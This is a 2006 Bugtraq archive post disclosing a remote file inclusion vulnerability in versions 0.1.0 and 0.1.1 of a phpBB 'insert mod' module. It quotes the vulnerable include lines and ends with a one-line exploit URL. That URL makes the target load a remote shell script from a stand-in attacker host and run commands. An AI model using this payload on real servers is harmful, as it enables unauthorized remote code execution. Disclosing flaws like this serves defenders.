Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Phpbb insert mod Remote file include
From: By_KorsaN_Son () hotmail com
Date: 12 Oct 2006 17:34:20 -0000
$ BiyoSecurity.Org & SecurityWall.Org

$ Script Name : Phpbb insert module

$ versions : 0.1.0 and 0.1.1

$ Risk : High

$ Regard : KorsaN

$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra

$ Vulnerable File : functions_mod_user.php

$ Vulnerable code : 

<-- code start -->


include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);
 

$ Exploit : 

www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls

  By Date           By Thread  

Current thread:
  • Phpbb insert mod Remote file include By_KorsaN_Son (Oct 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]